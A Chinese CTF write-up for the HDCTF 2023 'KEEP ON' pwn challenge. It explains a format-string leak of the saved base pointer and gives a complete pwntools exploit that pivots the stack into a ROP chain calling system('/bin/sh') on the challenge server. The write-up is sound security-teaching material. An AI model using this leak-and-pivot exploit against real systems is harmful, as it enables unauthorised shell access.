栈迁移([HDCTF 2023]KEEP ON)

栈迁移

[HDCTF 2023]KEEP ON | NSSCTF

  1. 题目给了一个格式化字符串的漏洞,和一个栈溢出漏洞,但是栈溢出的位置有限,只能溢出到返回值的位置,这样构造的ROP链不能完全写入到栈上,需要进行栈迁移:

  2. 确定栈迁移的目标位置:输入数组s的首地址,首先利用而格式化字符串泄漏bp寄存器指向的栈上的数据(是函数调用者即vuln的栈低指针),根据该值可以确定与s首地址的偏移x,从而用 泄漏的数据-x 来覆盖bp处的值, 泄漏的数据-x 处即为新的栈空间。

    • 调试确定 格式化字符串泄漏数据的位置bp处值与s的偏移量 ,可以看到bp寄存器指向的位置在输出字符串中的 第16个 ,s的首地址(0x7fffffffddb0)与泄漏的值(0x7fffffffde10)之间的距离相差 0x60

  3. EXP,其中 target+40 是我们输入字符串 b'/bin/sh' 的地址,要放在 pop_rdi_ret 传参:

    python 复制代码
    from pwn import *    
    context(os='linux', arch='amd64', log_level='debug')
    p=remote('node4.anna.nssctf.cn',28697)
    
    #ROPgadget获取一些必要指令的地址
    leave_ret = 0x4007f2	#栈迁移使用
    pop_rdi_ret = 0x4008d3	#传参使用
    ret_addr = 0x4005b9		#栈平衡使用
    sys_addr = 0x4005E0		#挟制ip使用
    p.recvuntil(b'please show me your name: \n')
    
    #泄漏地址
    payload = b'%16$p'
    p.sendline(payload)
    p.recvuntil(b'hello,')
    target = eval(p.recv(14).decode())
    print(hex(target))
    p.recvuntil(b'keep on !\n')
    
    #计算栈迁移后的首地址
    target = target - 0x60
    payload = (b'aaaaaaaa'+p64(ret_addr)+p64(pop_rdi_ret)+p64(target+40)+p64(sys_addr)+b'/bin/sh').ljust(0x50,b'\x00')+p64(target)+p64(leave_ret)
    p.sendline(payload)
    p.sendline(b'cat flag.txt')
    p.interactive()
相关推荐
芊寻(嵌入式)1 小时前
C转C++学习笔记--基础知识摘录总结
开发语言·c++·笔记·学习
准橙考典1 小时前
怎么能更好的通过驾考呢?
人工智能·笔记·自动驾驶·汽车·学习方法
密码小丑3 小时前
11月4日(内网横向移动(一))
笔记
鸭鸭梨吖4 小时前
产品经理笔记
笔记·产品经理
齐 飞4 小时前
MongoDB笔记01-概念与安装
前端·数据库·笔记·后端·mongodb
丫头,冲鸭!!!5 小时前
B树(B-Tree)和B+树(B+ Tree)
笔记·算法
听忆.5 小时前
手机屏幕上进行OCR识别方案
笔记
Selina K5 小时前
shell脚本知识点记录
笔记·shell
6 小时前
开源竞争-数据驱动成长-11/05-大专生的思考
人工智能·笔记·学习·算法·机器学习
霍格沃兹测试开发学社测试人社区6 小时前
软件测试学习笔记丨Flask操作数据库-数据库和表的管理
软件测试·笔记·测试开发·学习·flask